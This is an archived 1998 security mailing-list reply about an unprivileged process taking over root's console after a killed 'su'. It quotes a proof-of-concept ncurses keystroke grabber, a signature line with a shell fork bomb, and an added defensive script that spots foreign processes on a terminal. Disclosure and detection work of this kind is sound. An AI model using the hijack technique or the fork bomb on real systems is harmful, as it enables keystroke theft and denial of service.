The described problem isn't a serious one. If user 'lcam' wants to take control over root's terminal, first of all he should force root to perform 'su lcam'. So an attacker could take control over root's terminal only in the case of an inexperienced superuser su'ing to unprivileged users.

Nevertheless, 'su' from the SimplePAMApps package developed by Andrew Morgan <morganat_private> is free of such a problem. The program doesn't allow an unprivileged user to kill it.

Regards,
Andrey V. Savochkin

On Sat, Mar 07, 1998 at 09:06:21PM +0100, Michal Zalewski wrote:
> With bash 2.01 and ncurses 4.1, any program launched at an unprivileged
> uid (eg. from 'su' shell) may take over a privileged user's console
> (to grab keystrokes or something else). I found it's quite easy when
> I tried to kill 'su' directly from an unprivileged shell with signal 9:
>
> [root@genome /]# su lcam
> [lcam@genome /]$ killall -9 su
> Killed
> [root@genome /]#
>
> That was normal, but suddenly I saw again the old prompt:
>
> [lcam@genome /]$
>
> From this point, two bash instances (the unprivileged one hasn't been
> killed with su!) were controlling my console at once... It looks
> just curious:
>
> [root@genome /]# id
> uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
> [lcam@genome /]$ id
> uid=502(lcam) gid=502(lcam) groups=502(lcam)
> [lcam@genome /]$
> [root@genome /]#
>
> Of course, it isn't so scary, because it has been done manually...
> But it can be easily used in a nasty program. A typical administrator
> believes that only the unprivileged account may be compromised when
> he's launching something on it, and usually he's right, but
> ncurses has a vulnerability which may be used to fool him. Unlike
> other lame su tricks, it's quite invisible (he may check on a
> second console - he's back in his REAL root shell, but we can
> still control his console).
>
> I wrote a simple program (it may even be
> launched from ~/.bashrc; in the meantime, su should be killed), which
> is able to grab keystroke(s) from the console:
>
> -- test.c --
> // gcc test.c -lncurses -oanything
> #include <curses.h>
> #include <stdlib.h>   /* system() */
>
> int main() {
>     initscr();        /* take over the terminal in curses mode */
>     noecho();         /* don't echo what is typed */
>     raw();            /* pass every key through, no line buffering */
>     /* getch() returns ERR (-1) on I/O error, so this loops forever */
>     while (1) if (getch()=='x') system("touch /tmp/VOILA");
> }
> -- eof --
>
> It isn't perfect, actually it grabs only one of the first 'x's, and fails
> to grab the next ones (a lot of i/o errors when debugged ;-). But it
> CAN do that. For sure it's possible to keep control much longer, as
> shown above (bash example). Maybe it's even possible to do it
> after logout, I haven't checked it.
>
> _______________________________________________________________________
> Michał Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private]
> To iterate is human, to recurse divine [P. Deutsch]
> =--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=
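The practical check an administrator wants after the scenario above is whether, once the 'su' session has ended and the root prompt is back, any process owned by the other uid is still attached to the same terminal. The following is an added example, not code from either poster; it assumes a procps-style `ps` that accepts `-eo pid=,uid=,tty=,comm=` (pid, numeric uid, terminal name as `ps` prints it, command) and filters that output for processes on a given terminal whose uid is not the expected owner. The sample input is constructed to mirror the thread's situation (root's shell and two leftover 'lcam' processes on tty1).

```shell
#!/bin/sh
# Added example: report processes attached to a terminal that belong to a
# uid other than the one expected to own that terminal.
# Input on stdin: lines shaped like `ps -eo pid=,uid=,tty=,comm=` output
# (assumed procps syntax): PID  UID  TTY  COMMAND
foreign_on_tty() {
    tty_name="$1"    # terminal name as ps prints it, e.g. tty1 or pts/0
    owner_uid="$2"   # numeric uid that should own the terminal
    awk -v tty="$tty_name" -v owner="$owner_uid" '
        $3 == tty && $2 != owner { print $1, $2, $4 }
    '
}

# Constructed sample in the shape of `ps -eo pid=,uid=,tty=,comm=` output:
# root's shell on tty1, two leftover uid-502 processes on tty1, root on tty2.
SAMPLE='  1234     0 tty1 bash
  1300   502 tty1 bash
  1301   502 tty1 anything
  1400     0 tty2 bash'

# Run the filter over the constructed sample for tty1 owned by uid 0.
check_sample() {
    printf '%s\n' "$SAMPLE" | foreign_on_tty tty1 0
}

# Live use on a real system (assumed ps/tty behaviour):
#   ps -eo pid=,uid=,tty=,comm= | foreign_on_tty "$(tty | sed 's#^/dev/##')" "$(id -u)"
check_sample
```

Any line printed is a process of another uid still sharing your terminal; in the thread's case that is exactly the unprivileged shell (and whatever it launched) that survived the killed 'su'. A clean result after returning from 'su' is what the SimplePAMApps behaviour described above is meant to guarantee.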
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:44:43 PDT